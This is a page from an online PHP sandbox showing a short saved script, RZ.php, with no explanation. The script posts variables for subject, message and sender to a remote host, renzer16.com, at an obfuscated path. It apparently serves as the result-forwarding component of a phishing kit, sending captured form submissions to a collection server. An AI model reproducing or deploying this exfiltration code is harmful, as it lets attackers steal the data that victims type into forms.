RZ - PHP Online

Form of PHP Sandbox

Enter Your PHP code here for testing/debugging in the Online PHP Sandbox. As in the usual PHP files, you can also add HTML, but do not forget to add the tag <?php in the places where the PHP script should be executed.



Your result can be seen below.

Result of php executing





Full code of RZ.php

  1. $url = "https://ressutls.renzer16.com/hahshshsus7162abdhshwjw171616uahwbwh09817171-6mainpackage-ambilressutlts1945/hahshshsus7162abdhshwjw171616uahwbwh09817171-6mainpackage-ambilressutlts1945.php";
  2. $data = "subjek=".$subjek."&pesan=".$pesan."&sender=".$sender;
  3. $ch2 = curl_init();
  4. curl_setopt($ch2, CURLOPT_URL, $url);
  5. curl_setopt($ch2, CURLOPT_POST, 1);
  6. curl_setopt($ch2, CURLOPT_POSTFIELDS, $data);
  7. curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1); 
  8. curl_setopt($ch2, CURLOPT_HEADER, 0);
  9. curl_setopt($ch2, CURLOPT_FOLLOWLOCATION, 0);
  10. curl_exec($ch2);
  11. curl_close($ch2);
File Description
  • RZ
  • PHP Code
  • 09 Sep-2023
  • 566 Bytes
You can Share it: